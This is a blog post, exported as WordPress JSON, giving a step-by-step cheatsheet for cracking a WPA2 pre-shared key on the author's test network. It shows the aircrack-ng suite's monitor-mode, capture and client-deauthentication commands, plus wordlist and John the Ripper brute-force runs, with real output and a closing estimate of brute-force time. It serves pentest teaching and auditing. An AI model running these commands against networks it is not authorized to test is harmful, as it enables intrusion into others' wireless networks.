{"id":1562,"date":"2009-02-24T13:29:41","date_gmt":"2009-02-24T11:29:41","guid":{"rendered":"http:\/\/www.corelan.be:8800\/index.php\/2009\/02\/24\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\/"},"modified":"2009-02-24T13:29:41","modified_gmt":"2009-02-24T11:29:41","slug":"cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper","status":"publish","type":"post","link":"https:\/\/www.corelan.be\/index.php\/2009\/02\/24\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\/","title":{"rendered":"Cheatsheet : Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper"},"content":{"rendered":"<p>Basic steps :<\/p>\n<ul>\n<li>Put interface in monitor mode <\/li>\n<li>Find wireless network (protected with WPA2 and a Pre Shared Key) <\/li>\n<li>Capture all packets <\/li>\n<li>Wait until you see a client and deauthenticate the client, so the handshake can be captured <\/li>\n<li>Crack the key using a dictionary file (or via John The Ripper) <\/li>\n<\/ul>\n<p>&#160;<\/p>\n<p>I\u2019ll use a Dlink DWL-G122 (USB) wireless network interface for this procedure.&#160; In backtrack4, this device is recognized as wlan0.<\/p>\n<p>First, put the card in monitor mode :<\/p>\n<div>\n<pre style=\"padding-right: 0px; padding-left: 0px; font-size: 8pt; padding-bottom: 0px; margin: 0em; overflow: visible; width: 100%; color: black; border-top-style: none; line-height: 12pt; padding-top: 0px; font-family: consolas, &#39;Courier New&#39;, courier, monospace; border-right-style: none; border-left-style: none; background-color: #f4f4f4; border-bottom-style: none\">root@bt:~# airmon-ng \n\nInterface       Chipset         Driver\n\nwifi0           Atheros         madwifi-ng\nath0            Atheros         madwifi-ng VAP (parent: wifi0)\nath1            Atheros         madwifi-ng VAP (parent: wifi0)\nwlan0           Ralink 2573 USB rt73usb - [phy0]\n\nroot@bt:~# airmon-ng start wlan0\n\nInterface       
Chipset         Driver\n\nwifi0           Atheros         madwifi-ng\nath0            Atheros         madwifi-ng VAP (parent: wifi0)\nath1            Atheros         madwifi-ng VAP (parent: wifi0)\nwlan0           Ralink 2573 USB rt73usb - [phy0]\n                                (monitor mode enabled on mon0)<\/pre>\n<\/div>\n<p>Ok, we can now use interface mon0<\/p>\n<p>Let\u2019s find a wireless network that uses WPA2 \/ PSK :<\/p>\n<div>\n<pre style=\"padding-right: 0px; padding-left: 0px; font-size: 8pt; padding-bottom: 0px; margin: 0em; overflow: visible; width: 100%; color: black; border-top-style: none; line-height: 12pt; padding-top: 0px; font-family: consolas, &#39;Courier New&#39;, courier, monospace; border-right-style: none; border-left-style: none; background-color: #f4f4f4; border-bottom-style: none\">root@bt:~# airodump-ng mon0\n\n CH  6 ][ Elapsed: 4 s ][ 2009-02-21 12:57                                         \n                                                                                                                                   \n BSSID              PWR  Beacons    #Data, #\/s  CH  MB   ENC  CIPHER AUTH ESSID                                                    \n                                                                                                                                   \n 00:19:5B:52:AD:F7  -33        5        0    0  10  54   WPA2 CCMP   PSK  TestNet                                                  \n                                                                                                                                   \n BSSID              STATION            PWR   Rate   Lost  Packets  Probe                                                            \n                                                                                                                                    \n 00:19:5B:52:AD:F7  00:1C:BF:90:5B:A3  -29   0- 1     12        4  TestNet<\/pre>\n<\/div>\n<p>Stop airodump-ng and run it 
again, writing all packets to disk :<\/p>\n<div>\n<pre style=\"padding-right: 0px; padding-left: 0px; font-size: 8pt; padding-bottom: 0px; margin: 0em; overflow: visible; width: 100%; color: black; border-top-style: none; line-height: 12pt; padding-top: 0px; font-family: consolas, &#39;Courier New&#39;, courier, monospace; border-right-style: none; border-left-style: none; background-color: #f4f4f4; border-bottom-style: none\">airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w \/tmp\/wpa2<\/pre>\n<\/div>\n<p>At this point, you have 2 options : either wait until a client connects and the 4-way handshake is complete, or deauthenticate an existing client and thus force it to reassociate.&#160; Time is money, so let\u2019s force the deauthentication. We need the BSSID of the AP (-a) and the MAC address of a connected client (-c) :<\/p>\n<div>\n<pre style=\"padding-right: 0px; padding-left: 0px; font-size: 8pt; padding-bottom: 0px; margin: 0em; overflow: visible; width: 100%; color: black; border-top-style: none; line-height: 12pt; padding-top: 0px; font-family: consolas, &#39;Courier New&#39;, courier, monospace; border-right-style: none; border-left-style: none; background-color: #f4f4f4; border-bottom-style: none\">root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0\n13:04:19  Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10\n13:04:20  Sending 64 directed DeAuth. 
STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]<\/pre>\n<\/div>\n<p>As a result, airodump-ng should indicate \u201cWPA Handshake:\u201d in the upper right corner<\/p>\n<div>\n<pre style=\"padding-right: 0px; padding-left: 0px; font-size: 8pt; padding-bottom: 0px; margin: 0em; overflow: visible; width: 100%; color: black; border-top-style: none; line-height: 12pt; padding-top: 0px; font-family: consolas, &#39;Courier New&#39;, courier, monospace; border-right-style: none; border-left-style: none; background-color: #f4f4f4; border-bottom-style: none\"> CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7                                         \n                                                                                                                                   \n BSSID              PWR RXQ  Beacons    #Data, #\/s  CH  MB   ENC  CIPHER AUTH ESSID                                                \n                                                                                                                                   \n 00:19:5B:52:AD:F7  -33 100     1338       99    0  10  54   WPA2 CCMP   PSK  TestNet                                              \n                                                                                                                                   \n BSSID              STATION            PWR   Rate   Lost  Packets  Probe                                                           \n                                                                                                                                   \n 00:19:5B:52:AD:F7  00:1C:BF:90:5B:A3  -27  54-54      0      230 <\/pre>\n<\/div>\n<p>Stop airodump-ng and make sure the files were created properly<\/p>\n<div>\n<pre style=\"padding-right: 0px; padding-left: 0px; font-size: 8pt; padding-bottom: 0px; margin: 0em; overflow: visible; width: 100%; color: black; border-top-style: none; line-height: 12pt; padding-top: 0px; font-family: consolas, 
&#39;Courier New&#39;, courier, monospace; border-right-style: none; border-left-style: none; background-color: #f4f4f4; border-bottom-style: none\">root@bt:\/# ls \/tmp\/wpa2* -al\n-rw-r--r-- 1 root root 35189 2009-02-21 13:04 \/tmp\/wpa2-01.cap\n-rw-r--r-- 1 root root   476 2009-02-21 13:04 \/tmp\/wpa2-01.csv\n-rw-r--r-- 1 root root   590 2009-02-21 13:04 \/tmp\/wpa2-01.kismet.csv<\/pre>\n<\/div>\n<p>From this point forward, you do not need to be anywhere near the wireless network. All cracking will happen offline, so you can stop airodump and other processes and even walk away from the AP. In fact, I would suggest you walk away and find yourself a cosy place where you can live, eat, sleep, etc\u2026 Cracking a WPA2 PSK key is based on bruteforcing, and it can take a very very long time.&#160; There are 2 ways of bruteforcing : one that is relatively fast but does not guarantee success and one that is very slow, but guarantees that you will find the key at some point in time.<\/p>\n<p>The first option is to use a wordlist\/dictionary file.&#160; A lot of these files can be found on the internet (e.g. <a href=\"http:\/\/www.theargon.com\">www.theargon.com<\/a> or on packetstorm (see the archives)), or can be generated with tools such as John The Ripper. Once the wordlist is created, all you need to do is run aircrack-ng with the wordlist and feed it the .cap file that contains the WPA2 Handshake. 
<\/p>\n<p>So if your wordlist is called word.lst (under \/tmp\/wordlists), you can run<\/p>\n<div>\n<pre style=\"padding-right: 0px; padding-left: 0px; font-size: 8pt; padding-bottom: 0px; margin: 0em; overflow: visible; width: 100%; color: black; border-top-style: none; line-height: 12pt; padding-top: 0px; font-family: consolas, &#39;Courier New&#39;, courier, monospace; border-right-style: none; border-left-style: none; background-color: #f4f4f4; border-bottom-style: none\">aircrack-ng -w \/tmp\/wordlists\/word.lst -b 00:19:5B:52:AD:F7 \/tmp\/wpa2*.cap<\/pre>\n<\/div>\n<div>&#160;<\/div>\n<div>The success of cracking the WPA2 PSK key is directly linked to the strength of your password file. In other words, you may get lucky and get the key very fast, or you may not get the key at all.<\/div>\n<div>The second method (bruteforcing) will be successful for sure, but it may take ages to complete. Keep in mind, a WPA2 key can be up to 64 characters, so in theory you would have to build every password combination with all possible character sets and feed them into aircrack. If you want to use John The Ripper to create all possible password combinations and feed them into aircrack-ng, this is the command to use :<\/div>\n<div>&#160;<\/div>\n<div>\n<pre style=\"padding-right: 0px; padding-left: 0px; font-size: 8pt; padding-bottom: 0px; margin: 0em; overflow: visible; width: 100%; color: black; border-top-style: none; line-height: 12pt; padding-top: 0px; font-family: consolas, &#39;Courier New&#39;, courier, monospace; border-right-style: none; border-left-style: none; background-color: #f4f4f4; border-bottom-style: none\">root@bt:~# \/pentest\/password\/jtr\/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w - \/tmp\/wpa2*.cap<\/pre>\n<\/div>\n<p>(Note : the PSK in my testlab is only 8 characters, contains one uppercase character and 4 numbers). 
I will post the output when the key is cracked, including the time it required to crack the key.<\/p>\n<p>That\u2019s it<\/p>\n<p>&#160;<\/p>\n<p>Update : after 20 hours of cracking, the key still has not been found.&#160; The system I\u2019m using to crack the keys is not very fast, but let\u2019s look at some facts :<\/p>\n<p>8 characters, plain characters (lowercase and uppercase) or digits = each character in the key can have 26+26+10 (62) possible values. So the maximum number of combinations that need to be checked in the bruteforce process is 62 * 62 * 62 * 62 * 62 * 62 * 62 * 62 =&#160; 218 340 105 584 896.&#160; At about 600 keys per second on my \u201cslow\u201d system, it could take more than 101083382 hours to find the key&#160; (11539 years).&#160; I have stopped the cracking process as my machine is way too slow to crack the key while I\u2019m still alive\u2026&#160; So think about this when doing a WPA2 PSK Audit. <\/p>\n","protected":false},"excerpt":{"rendered":"<p>Basic steps : Put interface in monitor mode Find wireless network (protected with WPA2 and a Pre Shared Key) Capture all packets Wait until you see a client and deauthenticate the client, so the handshake can be captured Crack the key using a dictionary file (or via John The Ripper) &#160; I\u2019ll use a Dlink &hellip; <a href=\"https:\/\/www.corelan.be\/index.php\/2009\/02\/24\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\/\" class=\"more-link\">Continue reading<span class=\"screen-reader-text\"> \"Cheatsheet : Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The 
Ripper\"<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[64,164,127],"tags":[3734,1512,1494,535,204,131],"class_list":["post-1562","post","type-post","status-publish","format-standard","hentry","category-linux","category-networking","category-security","tag-wpa-wpa2","tag-wireless","tag-aircrack","tag-encryption","tag-backtrack","tag-linux"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Cheatsheet : Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper - Corelan | Exploit Development &amp; Vulnerability Research<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.corelan.be\/index.php\/2009\/02\/24\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Cheatsheet : Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper - Corelan | Exploit Development &amp; Vulnerability Research\" \/>\n<meta property=\"og:description\" content=\"Basic steps : Put interface in monitor mode Find wireless network (protected with 
WPA2 and a Pre Shared Key) Capture all packets Wait until you see a client and deauthenticate the client, so the handshake can be captured Crack the key using a dictionary file (or via John The Ripper) &#160; I\u2019ll use a Dlink &hellip; Continue reading &quot;Cheatsheet : Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper&quot;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.corelan.be\/index.php\/2009\/02\/24\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\/\" \/>\n<meta property=\"og:site_name\" content=\"Corelan | Exploit Development &amp; Vulnerability Research\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/corelanconsulting\" \/>\n<meta property=\"article:published_time\" content=\"2009-02-24T11:29:41+00:00\" \/>\n<meta name=\"author\" content=\"corelanc0d3r\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@corelanc0d3r\" \/>\n<meta name=\"twitter:site\" content=\"@corelanc0d3r\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"TechArticle\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2009\\\/02\\\/24\\\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2009\\\/02\\\/24\\\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\\\/\"},\"author\":{\"name\":\"corelanc0d3r\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#\\\/schema\\\/person\\\/3be5542b9b0a0787893db83a5ad68e8f\"},\"headline\":\"Cheatsheet : Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The 
Ripper\",\"datePublished\":\"2009-02-24T11:29:41+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2009\\\/02\\\/24\\\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\\\/\"},\"wordCount\":651,\"publisher\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#organization\"},\"keywords\":[\"wpa wpa2\",\"wireless\",\"aircrack\",\"encryption\",\"backtrack\",\"Linux and Unix\"],\"articleSection\":[\"Linux and Unix\",\"Networking\",\"Security\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2009\\\/02\\\/24\\\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\\\/\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2009\\\/02\\\/24\\\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\\\/\",\"name\":\"Cheatsheet : Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper - Corelan | Exploit Development &amp; Vulnerability Research\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#website\"},\"datePublished\":\"2009-02-24T11:29:41+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2009\\\/02\\\/24\\\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2009\\\/02\\\/24\\\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2009\\\/02\\\/24\\\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.corelan.be\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Cheatsheet : Cracking WPA2 PSK with Backtrack 4, 
aircrack-ng and John The Ripper\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#website\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/\",\"name\":\"Corelan CyberSecurity Research\",\"description\":\"Corelan publishes in-depth tutorials on exploit development, Windows exploitation, vulnerability research, heap internals, reverse engineering and security tooling used by professionals worldwide.\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.corelan.be\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#organization\",\"name\":\"Corelan CyberSecurity Research\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/wp-content\\\/uploads\\\/2026\\\/03\\\/corelanlogo2_small-20.png\",\"contentUrl\":\"https:\\\/\\\/www.corelan.be\\\/wp-content\\\/uploads\\\/2026\\\/03\\\/corelanlogo2_small-20.png\",\"width\":200,\"height\":200,\"caption\":\"Corelan CyberSecurity 
Research\"},\"image\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/corelanconsulting\",\"https:\\\/\\\/x.com\\\/corelanc0d3r\",\"https:\\\/\\\/x.com\\\/corelanconsulting\",\"https:\\\/\\\/instagram.com\\\/corelanconsult\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#\\\/schema\\\/person\\\/3be5542b9b0a0787893db83a5ad68e8f\",\"name\":\"corelanc0d3r\",\"pronouns\":\"he\\\/him\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x\",\"caption\":\"corelanc0d3r\"},\"description\":\"Peter Van Eeckhoutte is the founder of Corelan and a globally recognized expert in exploit development and vulnerability research. With over two decades in IT security, he built Corelan into a respected platform for deep technical research, hands-on training, and knowledge sharing. Known for his influential exploit development tutorials, tools, and real-world training, Peter combines a strong research mindset with a passion for education\u2014helping security professionals understand not just how exploits work, but why.\",\"sameAs\":[\"https:\\\/\\\/www.corelan-training.com\",\"https:\\\/\\\/instagram.com\\\/corelanc0d3r\",\"https:\\\/\\\/www.linkedin.com\\\/in\\\/petervaneeckhoutte\\\/\",\"https:\\\/\\\/x.com\\\/corelanc0d3r\"],\"url\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/author\\\/admin0\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. 
-->","yoast_head_json":{"title":"Cheatsheet : Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper - Corelan | Exploit Development &amp; Vulnerability Research","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.corelan.be\/index.php\/2009\/02\/24\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\/","og_locale":"en_US","og_type":"article","og_title":"Cheatsheet : Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper - Corelan | Exploit Development &amp; Vulnerability Research","og_description":"Basic steps : Put interface in monitor mode Find wireless network (protected with WPA2 and a Pre Shared Key) Capture all packets Wait until you see a client and deauthenticate the client, so the handshake can be captured Crack the key using a dictionary file (or via John The Ripper) &#160; I\u2019ll use a Dlink &hellip; Continue reading \"Cheatsheet : Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper\"","og_url":"https:\/\/www.corelan.be\/index.php\/2009\/02\/24\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\/","og_site_name":"Corelan | Exploit Development &amp; Vulnerability 
Research","article_publisher":"https:\/\/www.facebook.com\/corelanconsulting","article_published_time":"2009-02-24T11:29:41+00:00","author":"corelanc0d3r","twitter_card":"summary_large_image","twitter_creator":"@corelanc0d3r","twitter_site":"@corelanc0d3r","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"TechArticle","@id":"https:\/\/www.corelan.be\/index.php\/2009\/02\/24\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\/#article","isPartOf":{"@id":"https:\/\/www.corelan.be\/index.php\/2009\/02\/24\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\/"},"author":{"name":"corelanc0d3r","@id":"https:\/\/www.corelan.be\/#\/schema\/person\/3be5542b9b0a0787893db83a5ad68e8f"},"headline":"Cheatsheet : Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper","datePublished":"2009-02-24T11:29:41+00:00","mainEntityOfPage":{"@id":"https:\/\/www.corelan.be\/index.php\/2009\/02\/24\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\/"},"wordCount":651,"publisher":{"@id":"https:\/\/www.corelan.be\/#organization"},"keywords":["wpa wpa2","wireless","aircrack","encryption","backtrack","Linux and Unix"],"articleSection":["Linux and Unix","Networking","Security"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.corelan.be\/index.php\/2009\/02\/24\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\/","url":"https:\/\/www.corelan.be\/index.php\/2009\/02\/24\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\/","name":"Cheatsheet : Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper - Corelan | Exploit Development &amp; Vulnerability 
Research","isPartOf":{"@id":"https:\/\/www.corelan.be\/#website"},"datePublished":"2009-02-24T11:29:41+00:00","breadcrumb":{"@id":"https:\/\/www.corelan.be\/index.php\/2009\/02\/24\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.corelan.be\/index.php\/2009\/02\/24\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.corelan.be\/index.php\/2009\/02\/24\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.corelan.be\/"},{"@type":"ListItem","position":2,"name":"Cheatsheet : Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper"}]},{"@type":"WebSite","@id":"https:\/\/www.corelan.be\/#website","url":"https:\/\/www.corelan.be\/","name":"Corelan CyberSecurity Research","description":"Corelan publishes in-depth tutorials on exploit development, Windows exploitation, vulnerability research, heap internals, reverse engineering and security tooling used by professionals worldwide.","publisher":{"@id":"https:\/\/www.corelan.be\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.corelan.be\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.corelan.be\/#organization","name":"Corelan CyberSecurity 
Research","url":"https:\/\/www.corelan.be\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.corelan.be\/#\/schema\/logo\/image\/","url":"https:\/\/www.corelan.be\/wp-content\/uploads\/2026\/03\/corelanlogo2_small-20.png","contentUrl":"https:\/\/www.corelan.be\/wp-content\/uploads\/2026\/03\/corelanlogo2_small-20.png","width":200,"height":200,"caption":"Corelan CyberSecurity Research"},"image":{"@id":"https:\/\/www.corelan.be\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/corelanconsulting","https:\/\/x.com\/corelanc0d3r","https:\/\/x.com\/corelanconsulting","https:\/\/instagram.com\/corelanconsult"]},{"@type":"Person","@id":"https:\/\/www.corelan.be\/#\/schema\/person\/3be5542b9b0a0787893db83a5ad68e8f","name":"corelanc0d3r","pronouns":"he\/him","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x","url":"https:\/\/secure.gravatar.com\/avatar\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x","caption":"corelanc0d3r"},"description":"Peter Van Eeckhoutte is the founder of Corelan and a globally recognized expert in exploit development and vulnerability research. With over two decades in IT security, he built Corelan into a respected platform for deep technical research, hands-on training, and knowledge sharing. 
Known for his influential exploit development tutorials, tools, and real-world training, Peter combines a strong research mindset with a passion for education\u2014helping security professionals understand not just how exploits work, but why.","sameAs":["https:\/\/www.corelan-training.com","https:\/\/instagram.com\/corelanc0d3r","https:\/\/www.linkedin.com\/in\/petervaneeckhoutte\/","https:\/\/x.com\/corelanc0d3r"],"url":"https:\/\/www.corelan.be\/index.php\/author\/admin0\/"}]}},"views":383386,"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/posts\/1562","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/comments?post=1562"}],"version-history":[{"count":0,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/posts\/1562\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/media?parent=1562"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/categories?post=1562"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/tags?post=1562"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}